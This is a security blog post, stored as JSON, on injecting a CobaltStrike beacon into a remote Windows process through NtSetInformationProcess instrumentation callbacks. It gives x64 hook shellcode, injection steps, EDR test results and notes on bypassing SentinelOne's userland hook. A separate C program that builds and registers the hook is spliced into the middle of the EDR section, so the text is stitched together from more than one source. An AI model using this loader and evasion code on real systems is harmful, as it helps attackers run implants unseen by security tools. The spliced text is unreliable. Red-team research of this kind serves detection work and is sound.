{"id":21481,"date":"2023-10-02T10:19:04","date_gmt":"2023-10-02T09:19:04","guid":{"rendered":"https:\/\/www.riskinsight-wavestone.com\/?p=21481"},"modified":"2023-10-10T15:12:31","modified_gmt":"2023-10-10T14:12:31","slug":"process-injection-using-ntsetinformationprocess","status":"publish","type":"post","link":"https:\/\/www.riskinsight-wavestone.com\/en\/2023\/10\/process-injection-using-ntsetinformationprocess\/","title":{"rendered":"Process Injection using NtSetInformationProcess"},"content":{"rendered":"\n\n\n\n\n<p><style>code { color: rgb(255,0,102); }<\/style><\/p>\n<div>Process injection is a family of <strong>malware development techniques<\/strong> allowing an attacker to execute a malicious payload inside the <strong>address space<\/strong> of a <strong>legitimate process<\/strong>.<\/div>\n<div>These techniques are interesting because the malicious payload is executed by a legitimate process that may be <strong>less inspected<\/strong> by a security product such as an <strong>EDR<\/strong>.<\/div>\n<div>However, in order to perform this injection, the attacker needs <strong>specific functions<\/strong> for memory allocation, and execution primitives to write and execute the payload in the remote process. 
In standard process injection patterns, these functions are usually the following Win32 APIs: <code>VirtualAllocEx<\/code>, <code>WriteProcessMemory<\/code> and <code>CreateRemoteThread<\/code>.<\/div>\n<div>\u00a0<\/div>\n<div><img loading=\"lazy\" decoding=\"async\" class=\"size-full wp-image-21492 aligncenter\" src=\"https:\/\/www.riskinsight-wavestone.com\/wp-content\/uploads\/2023\/10\/01.png\" alt=\"\" width=\"945\" height=\"445\" srcset=\"https:\/\/www.riskinsight-wavestone.com\/wp-content\/uploads\/2023\/10\/01.png 945w, https:\/\/www.riskinsight-wavestone.com\/wp-content\/uploads\/2023\/10\/01-406x191.png 406w, https:\/\/www.riskinsight-wavestone.com\/wp-content\/uploads\/2023\/10\/01-71x33.png 71w, https:\/\/www.riskinsight-wavestone.com\/wp-content\/uploads\/2023\/10\/01-768x362.png 768w\" sizes=\"auto, (max-width: 945px) 100vw, 945px\" \/><\/div>\n<div>\u00a0<\/div>\n<div style=\"text-align: center;\"><em>Figure 1: Standard process injection pattern<\/em><\/div>\n<div>\u00a0<\/div>\n<div>\u00a0<\/div>\n<div>Security products take advantage of the fact that <strong>these functions are mandatory in the standard pattern<\/strong> to detect and block process injection by <strong>monitoring these API calls<\/strong>. Therefore, in order to keep this type of technique viable, attackers must <strong>find other ways to allocate<\/strong>, write and execute memory in a remote process.<\/div>\n<div>This post presents an alternative technique allowing execution at an arbitrary memory address in a remote process, which can replace the standard <code>CreateRemoteThread<\/code> call.<\/div>\n<div>\u00a0<\/div>\n<div>\u00a0<\/div>\n<h2>Nirvana Debugger<\/h2>\n<h3>Definition<\/h3>\n<div>In 2015, Alex Ionescu gave a presentation about <a href=\"https:\/\/github.com\/ionescu007\/HookingNirvana\/blob\/master\/Esoteric%20Hooks.pdf\">Esoteric Debugging Techniques<\/a>.<\/div>\n<div>One of the topics tackled is the <strong>Nirvana debugging technique<\/strong>. 
This method allows a process to install a hook that is called <strong>on the return from every syscall<\/strong> it performs.<\/div>\n<div>When a process performs a syscall, it hands the execution flow over to the kernel. Then, once the kernel procedure associated with the syscall returns, the kernel usually hands execution back to the calling process, as shown in the following figure:<\/div>\n<div>\u00a0<\/div>\n<div><img loading=\"lazy\" decoding=\"async\" class=\"size-full wp-image-21494 aligncenter\" src=\"https:\/\/www.riskinsight-wavestone.com\/wp-content\/uploads\/2023\/10\/02.png\" alt=\"\" width=\"346\" height=\"463\" srcset=\"https:\/\/www.riskinsight-wavestone.com\/wp-content\/uploads\/2023\/10\/02.png 346w, https:\/\/www.riskinsight-wavestone.com\/wp-content\/uploads\/2023\/10\/02-143x191.png 143w, https:\/\/www.riskinsight-wavestone.com\/wp-content\/uploads\/2023\/10\/02-29x39.png 29w\" sizes=\"auto, (max-width: 346px) 100vw, 346px\" \/><\/div>\n<div>\u00a0<\/div>\n<div style=\"text-align: center;\"><em>Figure 2: Standard process\/kernel interaction<\/em><\/div>\n<div>\u00a0<\/div>\n<div>\u00a0<\/div>\n<div>With the Nirvana debugging technique, it is possible to <strong>register a function<\/strong> (executed in <strong>userland<\/strong>) that is called just before the process regains control from the kernel: the kernel <strong>redirects the execution flow to this hook<\/strong> instead of returning to the interrupted code, as shown in the following figure:<\/div>\n<div>\u00a0<\/div>\n<div><img loading=\"lazy\" decoding=\"async\" class=\"size-full wp-image-21496 aligncenter\" src=\"https:\/\/www.riskinsight-wavestone.com\/wp-content\/uploads\/2023\/10\/03.png\" alt=\"\" width=\"440\" height=\"399\" srcset=\"https:\/\/www.riskinsight-wavestone.com\/wp-content\/uploads\/2023\/10\/03.png 440w, https:\/\/www.riskinsight-wavestone.com\/wp-content\/uploads\/2023\/10\/03-211x191.png 211w, 
https:\/\/www.riskinsight-wavestone.com\/wp-content\/uploads\/2023\/10\/03-43x39.png 43w\" sizes=\"auto, (max-width: 440px) 100vw, 440px\" \/>\n<div>\u00a0<\/div>\n<div style=\"text-align: center;\"><em>Figure 3: Execution flow is redirected<\/em><\/div>\n<\/div>\n<div>\u00a0<\/div>\n<div>\u00a0<\/div>\n<div>In this hook, all the information needed during a debugging session is available, including <strong>which syscall<\/strong> has been executed, the address from which the syscall was called and the syscall\u2019s return code. The use of this mechanism as a process injection primitive was first discussed in 2020 in the article <a href=\"https:\/\/splintercod3.blogspot.com\/p\/weaponizing-mapping-injection-with.html\">Weaponizing Mapping Injection with Instrumentation Callback for stealthier process injection<\/a> by <a href=\"https:\/\/twitter.com\/splinter_code\">@splinter_code<\/a>.<\/div>\n<div>\u00a0<\/div>\n<div>\u00a0<\/div>\n<h3>Implementation<\/h3>\n<div><code>ntdll.dll<\/code> exports the native API <code>NtSetInformationProcess<\/code>, which can be used to register a Nirvana callback through the undocumented <code>ProcessInstrumentationCallback<\/code> information class (value 40):<\/div>\n<div>\u00a0<\/div>\n<div><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-21498 aligncenter\" src=\"https:\/\/www.riskinsight-wavestone.com\/wp-content\/uploads\/2023\/10\/04.png\" alt=\"\" width=\"605\" height=\"380\" srcset=\"https:\/\/www.riskinsight-wavestone.com\/wp-content\/uploads\/2023\/10\/04.png 605w, https:\/\/www.riskinsight-wavestone.com\/wp-content\/uploads\/2023\/10\/04-304x191.png 304w, https:\/\/www.riskinsight-wavestone.com\/wp-content\/uploads\/2023\/10\/04-62x39.png 62w\" sizes=\"auto, (max-width: 605px) 100vw, 605px\" \/><\/div>\n<div>\u00a0<\/div>\n<div style=\"text-align: center;\"><em>Figure 4: Basic Nirvana hook definition<\/em><\/div>\n<div>\u00a0<\/div>\n<div>\u00a0<\/div>\n<div>The <code>NtSetInformationProcess<\/code> function takes a process handle (<code>hProc<\/code>) as a parameter, which should make it possible to add a hook on a <strong>remote process<\/strong>.<\/div>\n<div>\u00a0<\/div>\n<div>\u00a0<\/div>\n<h3>On a remote process<\/h3>\n<div>The <code>NtSetInformationProcess<\/code> prototype shows that it can be used to alter a <strong>remote process\u2019s configuration<\/strong>.<\/div>\n<div>However, looking at the function code in <code>ntoskrnl.exe<\/code> shows that the instrumentation callback can only be set on a remote process when <code>SeDebugPrivilege<\/code> is enabled in the caller\u2019s token:<\/div>\n<div>\u00a0<\/div>\n<div><img loading=\"lazy\" decoding=\"async\" class=\"size-full wp-image-21500 aligncenter\" src=\"https:\/\/www.riskinsight-wavestone.com\/wp-content\/uploads\/2023\/10\/05.png\" alt=\"\" width=\"489\" height=\"222\" srcset=\"https:\/\/www.riskinsight-wavestone.com\/wp-content\/uploads\/2023\/10\/05.png 489w, https:\/\/www.riskinsight-wavestone.com\/wp-content\/uploads\/2023\/10\/05-421x191.png 421w, https:\/\/www.riskinsight-wavestone.com\/wp-content\/uploads\/2023\/10\/05-71x32.png 71w\" sizes=\"auto, (max-width: 489px) 100vw, 489px\" \/><\/div>\n<div>\u00a0<\/div>\n<div style=\"text-align: center;\"><em>Figure 5: Need to activate SE_DEBUG<\/em><\/div>\n<div>\u00a0<\/div>\n<div>\u00a0<\/div>\n<div><code>SeDebugPrivilege<\/code> is only granted to principals listed in the <strong>\u201cDebug programs\u201d user right assignment<\/strong>. Additionally, it cannot be enabled by processes running at an integrity level lower than \u201chigh\u201d. On most systems, these requirements translate to the need of <strong>running the malicious process<\/strong> with an account member of the <strong>local \u201cadministrators\u201d<\/strong> group, in <strong>elevated mode<\/strong>.<\/div>\n<div>\u00a0<\/div>\n<div>\u00a0<\/div>\n<h2>Process Injection With NtSetInformationProcess<\/h2>\n<div>As established in the previous sections, the <code>NtSetInformationProcess<\/code> native API can be used to <strong>register a hook on a remote process<\/strong>. 
So, it can be used to redirect a remote process\u2019s execution flow. However, the hook must be located inside the remote process\u2019s memory space.<\/div>\n<div>\u00a0<\/div>\n<div>\u00a0<\/div>\n<h3>Nirvana hook wrapper<\/h3>\n<div>The final goal is to inject a shellcode in the remote process that will be triggered as a Nirvana hook and will call a <strong>CobaltStrike<\/strong> beacon.<\/div>\n<div>The process can be split into two steps:<\/div>\n<ul style=\"list-style-type: square;\">\n<li>First, the CobaltStrike beacon is written at a given address <code>${CSAddr}<\/code> in the remote process memory space.<\/li>\n<li>Then the Nirvana hook, which performs a <code>CALL ${CSAddr}<\/code>, is written at another address <code>${NirvanaAddr}<\/code> in the remote process memory space.<\/li>\n<\/ul>\n<div>\u00a0<\/div>\n<div>A short kernel debugging session on a process with a Nirvana hook installed shows that:<\/div>\n<ul style=\"list-style-type: square;\">\n<li><strong>The kernel only performs a <code>JMP<\/code><\/strong> to the hook address, letting the hook itself redirect the execution flow back to the calling NT function. <br \/>This part is an interesting lesson on Windows internals. 
As the kernel performs a <code>JMP\/CALL<\/code> to a userland function on behalf of user mode to run the Nirvana hook, this could be a way to <strong>bypass Windows Control Flow Guard<\/strong>, because this check is usually performed in userland by the <code>LdrpValidateUserCallTarget<\/code> function.<br \/>Here, the kernel had to reimplement this function under the name <code>MmValidateUserCallTarget<\/code> to ensure the callback address is a valid call target in the process\u2019s CFG bitmap. Note that this check does not block the injection described here: executable memory allocated with <code>VirtualAllocEx<\/code> is marked as a valid CFG call target by default (unless <code>PAGE_TARGETS_INVALID<\/code> is requested), so a freshly allocated hook buffer passes it.<\/li>\n<\/ul>\n<div><img loading=\"lazy\" decoding=\"async\" class=\"size-full wp-image-21502 aligncenter\" src=\"https:\/\/www.riskinsight-wavestone.com\/wp-content\/uploads\/2023\/10\/06.png\" alt=\"\" width=\"412\" height=\"260\" srcset=\"https:\/\/www.riskinsight-wavestone.com\/wp-content\/uploads\/2023\/10\/06.png 412w, https:\/\/www.riskinsight-wavestone.com\/wp-content\/uploads\/2023\/10\/06-303x191.png 303w, https:\/\/www.riskinsight-wavestone.com\/wp-content\/uploads\/2023\/10\/06-62x39.png 62w\" sizes=\"auto, (max-width: 412px) 100vw, 412px\" \/><\/div>\n<div>\u00a0<\/div>\n<div style=\"text-align: center;\"><em>Figure 6: Control Flow Guard at kernel level<\/em><\/div>\n<div>\u00a0<\/div>\n<div>\u00a0<\/div>\n<ul style=\"list-style-type: square;\">\n<li>The return address into the calling NT function (the instruction following the <code>syscall<\/code> in <code>ntdll.dll<\/code>) is stored in the <code>R10<\/code> register: the kernel saves the original <code>RIP<\/code> there before redirecting execution to the hook.<\/li>\n<li>The syscall\u2019s return value (<code>NTSTATUS<\/code>) is in <code>RAX<\/code> and must reach the caller unchanged; <code>R11<\/code> receives the saved <code>RFLAGS<\/code> when the kernel returns to user mode with <code>sysret<\/code>. The shellcode below saves both along with the other registers it touches.<\/li>\n<\/ul>\n<div>\u00a0<\/div>\n<div>So, once the <strong>CobaltStrike<\/strong> beacon has been executed, the hook must jump to <code>R10<\/code> to hand the execution flow back to the calling NT function. 
A basic piece of assembly can be used:<\/div>\n<div>\u00a0<\/div>\n<pre>push rbp<br \/>mov rbp, rsp<br \/>; save the registers the hook relies on (R10 is the return address set by the kernel)<br \/>push rax<br \/>push rbx<br \/>push rcx<br \/>push r9<br \/>push r10<br \/>push r11<br \/>movabs rax, ${CSAddr}   ; address of the beacon in the remote process<br \/>call rax<br \/>pop r11<br \/>pop r10<br \/>pop r9<br \/>pop rcx<br \/>pop rbx<br \/>pop rax<br \/>pop rbp<br \/>jmp r10                 ; resume the interrupted NT function<\/pre>\n<div>\u00a0<\/div>\n<div>This shellcode looks fine, but it will in fact <strong>create an infinite loop<\/strong>: it is called every time a syscall is performed, and the beacon itself performs syscalls. So it must be modified in order to be <strong>executed only once<\/strong>.<\/div>\n<div>For example, the code can be made self-modifying so that it replaces its own <code>PUSH RBP<\/code> with a <code>JMP R10<\/code>, which breaks the loop:<\/div>\n<div>\u00a0<\/div>\n<pre>push rbp<br \/>mov rbp, rsp<br \/><br \/>; Overwrite the PUSH RBP at the start of the hook with JMP R10 (bytes 41 FF E2).<br \/>; This instruction is 11 bytes long (REX.W C7 05 disp32 imm32), so RIP - 15 is offset 0.<br \/>; The imm32 is sign-extended and stored as a qword; the trailing zero bytes are never executed.<br \/>mov qword ptr [rip - 15], 0xE2FF41<br \/><br \/>push rax<br \/>push rbx<br \/>push rcx<br \/>push r9<br \/>push r10<br \/>push r11<br \/>movabs rax, ${CSAddr}<br \/>call rax<br \/>pop r11<br \/>pop r10<br \/>pop r9<br \/>pop rcx<br \/>pop rbx<br \/>pop rax<br \/>pop rbp<br \/>jmp r10<\/pre>\n<div>\u00a0<\/div>\n<div>So, once the hook has been executed once, every later call just jumps to <code>R10<\/code> without re-executing the beacon.<\/div>\n<div>\u00a0<\/div>\n<div>\u00a0<\/div>\n<h3>Wrapping it all together<\/h3>\n<div>Now that the different shellcodes are written, it is possible to perform the injection:<\/div>\n<ul style=\"list-style-type: square;\">\n<li>Open the <code>notepad.exe<\/code> process with your process opening primitive<\/li>\n<li>Allocate an <strong>RX<\/strong> buffer in the <code>notepad.exe<\/code> process for the <strong>CobaltStrike<\/strong> beacon<\/li>\n<li>Modify the Nirvana shellcode in order to call the <strong>CobaltStrike<\/strong> beacon address in the remote process<\/li>\n<li>Allocate an <strong>RWX<\/strong> buffer in the <code>notepad.exe<\/code> process for the <strong>Nirvana hook<\/strong><\/li>\n<li>Write both the shellcode and the <strong>CobaltStrike<\/strong> beacon in their respective buffers<\/li>\n<li>Register the Nirvana hook using <code>NtSetInformationProcess<\/code><\/li>\n<li>Wait for <code>notepad.exe<\/code> to perform a syscall<\/li>\n<\/ul>\n<div>\u00a0<\/div>\n<div>The whole code is available on this GitHub repository: <a href=\"https:\/\/github.com\/OtterHacker\/SetProcessInjection\"><strong><span style=\"color: #000080;\">https:\/\/github.com\/OtterHacker\/SetProcessInjection<\/span><\/strong><\/a>.<\/div>\n<div>\u00a0<\/div>\n<div>\u00a0<\/div>\n<h3>Drawbacks<\/h3>\n<div>The most important drawback is that <code>SeDebugPrivilege<\/code> is mandatory for the injection. Therefore, this injection method can <strong>only be used during post-exploitation<\/strong> and <strong>not during initial access<\/strong>.<\/div>\n<div>The other problem, which could be fixed given some time, is that the <strong>Nirvana shellcode must be allocated as RWX<\/strong> in the remote buffer since it is self-rewriting.<\/div>\n<div>This could be solved by having the shellcode call <code>VirtualProtect<\/code> itself, or by finding another way to break the infinite hook loop (for example by calling <code>NtSetInformationProcess<\/code> again directly from the shellcode to remove the callback).<\/div>\n<div>\u00a0<\/div>\n<div>\u00a0<\/div>\n<h3>EDR inspection<\/h3>\n<div>The malware has been tested against <strong>Microsoft Defender For Endpoint<\/strong>, <strong>SentinelOne<\/strong>, <strong>TrendMicro<\/strong> and <strong>Sophos<\/strong>. <strong>None of them raised any alert<\/strong> regarding the execution primitive.<\/div>\n<div>However, the absence of alerts does not mean that no detection logic is in place. 
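Before looking at the EDR hooks, here is the hook assembly and the injection steps from the two previous sections expressed as an added example (not the post's code nor the SetProcessInjection repository): a C helper that emits the exact bytes of the self-disarming Nirvana hook with a chosen beacon address patched into the `movabs`, decodes the RIP-relative displacement of the self-patching store to confirm it lands on offset 0, and replays that first-run store to check the entry turns into `jmp r10`. The `PROCESS_INSTRUMENTATION_CALLBACK_INFORMATION` layout and the information class value 40 are taken from the community phnt headers (assumption: Microsoft does not document them); `register_remote_nirvana_hook` is only compiled on Windows and assumes the caller already holds SeDebugPrivilege and a handle opened with `PROCESS_SET_INFORMATION`; the beacon address in `main` is a constructed placeholder.

```c
/* Added example: builds and checks the self-disarming Nirvana hook stub.
 * Portable C99; only register_remote_nirvana_hook() needs Windows. */
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* PROCESSINFOCLASS value and structure layout from the phnt headers (assumption:
 * not documented by Microsoft). Version is 0 on x64; Callback is an address
 * that must be valid inside the TARGET process, not the injector. */
#define ProcessInstrumentationCallback 40
typedef struct {
    uint32_t Version;
    uint32_t Reserved;
    uint64_t Callback;
} PROCESS_INSTRUMENTATION_CALLBACK_INFORMATION;

enum {
    HOOK_SIZE      = 49,
    PATCH_INSN_OFF = 4,   /* mov qword ptr [rip-15], 0xE2FF41 */
    PATCH_INSN_LEN = 11,  /* REX.W C7 05 disp32 imm32          */
    BEACON_IMM_OFF = 26   /* imm64 of movabs rax, <beacon>     */
};

/* Emit the hook with beacon_addr patched into the movabs.
 * Returns HOOK_SIZE, or 0 if the output buffer is too small. */
size_t build_nirvana_hook(uint64_t beacon_addr, uint8_t *out, size_t cap)
{
    static const uint8_t tmpl[HOOK_SIZE] = {
        0x55,                                     /* push rbp                 */
        0x48, 0x89, 0xE5,                         /* mov  rbp, rsp            */
        0x48, 0xC7, 0x05, 0xF1, 0xFF, 0xFF, 0xFF, /* mov qword ptr [rip-15],  */
        0x41, 0xFF, 0xE2, 0x00,                   /*     0xE2FF41 (= jmp r10) */
        0x50, 0x53, 0x51,                         /* push rax/rbx/rcx         */
        0x41, 0x51, 0x41, 0x52, 0x41, 0x53,       /* push r9/r10/r11          */
        0x48, 0xB8, 0, 0, 0, 0, 0, 0, 0, 0,       /* movabs rax, <beacon>     */
        0xFF, 0xD0,                               /* call rax                 */
        0x41, 0x5B, 0x41, 0x5A, 0x41, 0x59,       /* pop r11/r10/r9           */
        0x59, 0x5B, 0x58, 0x5D,                   /* pop rcx/rbx/rax/rbp      */
        0x41, 0xFF, 0xE2                          /* jmp r10 (back to ntdll)  */
    };
    if (cap < HOOK_SIZE) return 0;
    memcpy(out, tmpl, HOOK_SIZE);
    for (int i = 0; i < 8; i++)                   /* little-endian imm64 */
        out[BEACON_IMM_OFF + i] = (uint8_t)(beacon_addr >> (8 * i));
    return HOOK_SIZE;
}

static uint32_t rd32(const uint8_t *p)
{
    return (uint32_t)p[0] | (uint32_t)p[1] << 8 | (uint32_t)p[2] << 16 | (uint32_t)p[3] << 24;
}

/* Beacon address currently encoded in the movabs (to verify the patching). */
uint64_t hook_beacon_addr(const uint8_t *hook)
{
    return (uint64_t)rd32(hook + BEACON_IMM_OFF) |
           (uint64_t)rd32(hook + BEACON_IMM_OFF + 4) << 32;
}

/* Offset written by the RIP-relative store: next RIP + disp32. Expected: 0. */
long patch_target_offset(const uint8_t *hook)
{
    int32_t disp = (int32_t)rd32(hook + PATCH_INSN_OFF + 3);
    return (long)(PATCH_INSN_OFF + PATCH_INSN_LEN) + disp;
}

/* Replay what the first execution does to the stub: the imm32 is sign-extended
 * to 64 bits and stored at the decoded target. Bytes 0..2 become "jmp r10";
 * bytes 3..7 (tail of mov rbp,rsp and head of the store itself) are zeroed,
 * which is harmless because every later call jumps away at byte 0. */
void simulate_first_run_patch(uint8_t *hook)
{
    int64_t imm = (int32_t)rd32(hook + PATCH_INSN_OFF + 7);
    long target = patch_target_offset(hook);
    for (int i = 0; i < 8; i++)
        hook[target + i] = (uint8_t)((uint64_t)imm >> (8 * i));
}

/* True once the entry has been rewritten to "jmp r10" (41 FF E2). */
int hook_is_disarmed(const uint8_t *hook)
{
    return hook[0] == 0x41 && hook[1] == 0xFF && hook[2] == 0xE2;
}

#ifdef _WIN32
#include <windows.h>
typedef LONG (NTAPI *NtSetInformationProcess_t)(HANDLE, ULONG, PVOID, ULONG);

/* Register hook_in_target (already written to RWX memory in the target) as the
 * remote process's instrumentation callback. Assumes SeDebugPrivilege is
 * enabled in the caller's token and hProc has PROCESS_SET_INFORMATION. */
LONG register_remote_nirvana_hook(HANDLE hProc, uint64_t hook_in_target)
{
    NtSetInformationProcess_t fn = (NtSetInformationProcess_t)
        GetProcAddress(GetModuleHandleA("ntdll.dll"), "NtSetInformationProcess");
    PROCESS_INSTRUMENTATION_CALLBACK_INFORMATION info = { 0, 0, hook_in_target };
    if (!fn) return -1;
    return fn(hProc, ProcessInstrumentationCallback, &info, (ULONG)sizeof info);
}
#endif

int main(void)
{
    uint8_t hook[HOOK_SIZE];
    uint64_t beacon = 0x00007FF6DEAD0000ULL;   /* constructed placeholder address */
    build_nirvana_hook(beacon, hook, sizeof hook);
    printf("store targets offset %ld, beacon 0x%llx\n",
           patch_target_offset(hook), (unsigned long long)hook_beacon_addr(hook));
    simulate_first_run_patch(hook);
    printf("disarmed after first run: %s\n", hook_is_disarmed(hook) ? "yes" : "no");
    return 0;
}
```

`BEACON_IMM_OFF` is what the "modify the Nirvana shellcode to call the beacon address" step patches at runtime, after the RX buffer for the beacon has been allocated and its remote address is known. Two caveats carried over from the listing itself: the stub reserves no 32-byte shadow space and does not realign `RSP` to 16 bytes before `call rax`, so a beacon that relies strictly on the x64 calling convention may need both added, and `patch_target_offset` must be read before the simulated store, since that store zeroes the first bytes of the `mov` it decodes.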
For example, looking at <code>ntdll!NtSetInformationProcess<\/code> in a process monitored by <strong>SentinelOne<\/strong> shows the following userland hook:<\/div>\n<div>\u00a0<\/div>\n<div><img loading=\"lazy\" decoding=\"async\" class=\"size-full wp-image-21504 aligncenter\" src=\"https:\/\/www.riskinsight-wavestone.com\/wp-content\/uploads\/2023\/10\/07.png\" alt=\"\" width=\"749\" height=\"227\" srcset=\"https:\/\/www.riskinsight-wavestone.com\/wp-content\/uploads\/2023\/10\/07.png 749w, https:\/\/www.riskinsight-wavestone.com\/wp-content\/uploads\/2023\/10\/07-437x132.png 437w, https:\/\/www.riskinsight-wavestone.com\/wp-content\/uploads\/2023\/10\/07-71x22.png 71w\" sizes=\"auto, (max-width: 749px) 100vw, 749px\" \/><\/div>\n<div>\u00a0<\/div>\n<div style=\"text-align: center;\"><em>Figure 7: SentinelOne userland hook<\/em><\/div>\n<div>\u00a0<\/div>\n<div>\u00a0<\/div>\n<div>Following the successive <code>JMP<\/code> instructions shows that the hook is located at <code>0x7ffd0160ab00<\/code>. 
Looking at the DLLs loaded in the process, it is possible to retrieve the base address of the SentinelOne DLL:<\/div>\n<div style=\"text-align: center;\">\u00a0<\/div>\n<div style=\"text-align: center;\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-21506\" src=\"https:\/\/www.riskinsight-wavestone.com\/wp-content\/uploads\/2023\/10\/08.png\" alt=\"\" width=\"517\" height=\"95\" srcset=\"https:\/\/www.riskinsight-wavestone.com\/wp-content\/uploads\/2023\/10\/08.png 517w, https:\/\/www.riskinsight-wavestone.com\/wp-content\/uploads\/2023\/10\/08-437x80.png 437w, https:\/\/www.riskinsight-wavestone.com\/wp-content\/uploads\/2023\/10\/08-71x13.png 71w\" sizes=\"auto, (max-width: 517px) 100vw, 517px\" \/><\/div>\n<div style=\"text-align: center;\"><em>Figure 8: SentinelOne DLL address<\/em><\/div>\n<div>\u00a0<\/div>\n<div>\u00a0<\/div>\n<div>So, the hook\u2019s code is stored in <code>InProcessClient64.dll<\/code> at offset <code>0x7ab00<\/code>.<\/div>\n<div>Disassembling the related function in IDA shows the following:<\/div>\n<div style=\"text-align: center;\">\u00a0<\/div>\n<div style=\"text-align: center;\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone  wp-image-21508\" src=\"https:\/\/www.riskinsight-wavestone.com\/wp-content\/uploads\/2023\/10\/09.png\" alt=\"\" width=\"556\" height=\"281\" srcset=\"https:\/\/www.riskinsight-wavestone.com\/wp-content\/uploads\/2023\/10\/09.png 766w, https:\/\/www.riskinsight-wavestone.com\/wp-content\/uploads\/2023\/10\/09-378x191.png 378w, https:\/\/www.riskinsight-wavestone.com\/wp-content\/uploads\/2023\/10\/09-71x36.png 71w\" sizes=\"auto, (max-width: 556px) 100vw, 556px\" \/><\/div>\n<div>\u00a0<\/div>\n<div style=\"text-align: center;\"><em>Figure 9: NtSetInformationProcess hook code<\/em><\/div>\n<div>\u00a0<\/div>\n<div>\u00a0<\/div>\n<div>We see that the hook copies the original parameters into a <code>SetInfoArgs<\/code> structure, packs it into a <code>SentinelHookParams<\/code> structure and calls the <code>ExecuteHook<\/code> function. This function is a succession of calls leading to the following code:<\/div>\n<div style=\"text-align: center;\">\u00a0<\/div>\n<div style=\"text-align: center;\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-21510\" src=\"https:\/\/www.riskinsight-wavestone.com\/wp-content\/uploads\/2023\/10\/10.png\" alt=\"\" width=\"407\" height=\"209\" srcset=\"https:\/\/www.riskinsight-wavestone.com\/wp-content\/uploads\/2023\/10\/10.png 407w, https:\/\/www.riskinsight-wavestone.com\/wp-content\/uploads\/2023\/10\/10-372x191.png 372w, https:\/\/www.riskinsight-wavestone.com\/wp-content\/uploads\/2023\/10\/10-71x36.png 71w\" sizes=\"auto, (max-width: 407px) 100vw, 407px\" \/><\/div>\n<div>\u00a0<\/div>\n<div style=\"text-align: center;\"><em>Figure 10: SentinelOne checks performed in the hook<\/em><\/div>\n<div>\u00a0<\/div>\n<div>\u00a0<\/div>\n<div>This function shows that SentinelOne <strong>performs checks in this hook<\/strong> that are specifically related to the <code>ProcessInformationClass<\/code> used to <strong>register a Nirvana hook<\/strong>.<\/div>\n<div>It would be possible to go through the different checks to understand the detection logic, but that is not the purpose of this post. However, some obvious checks can easily be observed. 
The following code shows that the <code>TTDINJECT.EXE<\/code> and <code>TTD.EXE<\/code> executables (related to <strong>Windows Time Travel Debugging<\/strong>, a legitimate user of instrumentation callbacks) seem to be whitelisted:<\/div>\n<div style=\"text-align: center;\">\u00a0<\/div>\n<div style=\"text-align: center;\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone  wp-image-21512\" src=\"https:\/\/www.riskinsight-wavestone.com\/wp-content\/uploads\/2023\/10\/11.png\" alt=\"\" width=\"624\" height=\"221\" srcset=\"https:\/\/www.riskinsight-wavestone.com\/wp-content\/uploads\/2023\/10\/11.png 757w, https:\/\/www.riskinsight-wavestone.com\/wp-content\/uploads\/2023\/10\/11-437x155.png 437w, https:\/\/www.riskinsight-wavestone.com\/wp-content\/uploads\/2023\/10\/11-71x25.png 71w\" sizes=\"auto, (max-width: 624px) 100vw, 624px\" \/><\/div>\n<div>\u00a0<\/div>\n<div style=\"text-align: center;\"><em>Figure 11: TTDINJECT whitelisting<\/em><\/div>\n<div>\u00a0<\/div>\n<div>\u00a0<\/div>\n<div>Likewise, additional checks are performed when SentinelOne\u2019s <code>ProtectDeepHooking<\/code> feature is activated:<\/div>\n<div style=\"text-align: center;\">\u00a0<\/div>\n<div style=\"text-align: center;\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone  wp-image-21514\" src=\"https:\/\/www.riskinsight-wavestone.com\/wp-content\/uploads\/2023\/10\/12.png\" alt=\"\" width=\"446\" height=\"146\" srcset=\"https:\/\/www.riskinsight-wavestone.com\/wp-content\/uploads\/2023\/10\/12.png 654w, https:\/\/www.riskinsight-wavestone.com\/wp-content\/uploads\/2023\/10\/12-437x143.png 437w, https:\/\/www.riskinsight-wavestone.com\/wp-content\/uploads\/2023\/10\/12-71x23.png 71w\" sizes=\"auto, (max-width: 446px) 100vw, 446px\" \/><\/div>\n<div>\u00a0<\/div>\n<div style=\"text-align: center;\"><em>Figure 12: Additional checks performed<\/em><\/div>\n<div>\u00a0<\/div>\n<div>\u00a0<\/div>\n<div>The point here is that <strong>some EDRs still perform detection through userland hooks<\/strong> on this API. However, like every userland detection mechanism, it can be <strong>bypassed<\/strong> with standard <strong>unhooking techniques<\/strong>, and no kernel callback has been found that detects or prevents the use of this API.<\/div>\n<div>\u00a0<\/div>\n<div>\u00a0<\/div>\n<h2>Conclusion<\/h2>\n<div>This conclusion is exactly the same as the one from my LeHack 2023 talk: <strong>instead of spending months trying to bypass an EDR from scratch, it can be worthwhile to look around and check whether some built-in behaviour could be hijacked to serve our purpose<\/strong>.<\/div>\n<div>\u00a0<\/div>\n<div><strong>Security products cannot monitor every Windows API<\/strong>, and while behavioural analysis is kicking in, it is still hard for them to <strong>determine whether a behaviour is legitimate or malicious<\/strong> when non-standard patterns are used.<\/div>\n<div>So, <span style=\"text-decoration: underline;\"><strong>be creative<\/strong><\/span>: Microsoft has created hundreds of functions, you will surely find one that satisfies your needs!<\/div>\n<div>\u00a0<\/div>\n<div>It seems that I am not the only one thinking like this, as a <a href=\"https:\/\/www.deepinstinct.com\/blog\/nofilter-abusing-windows-filtering-platform-for-privilege-escalation\">DEF CON 31 talk<\/a> about token duplication presented by Ron BEN YIZHAK also <strong>hijacks a non-standard Windows API<\/strong> to bypass standard detection by avoiding the classic direct Win32 API call.<\/div>\n<div>\u00a0<\/div>\n<div>\u00a0<\/div>\n<div style=\"text-align: right;\"><em>Yoann DEQUEKER<\/em><\/div>\n<div>\u00a0<\/div>\n","protected":false},"excerpt":{"rendered":"<p>Process injection is a family of malware development techniques allowing an attacker to execute a malicious payload into legitimate addressable memory space of a legitimate process. 
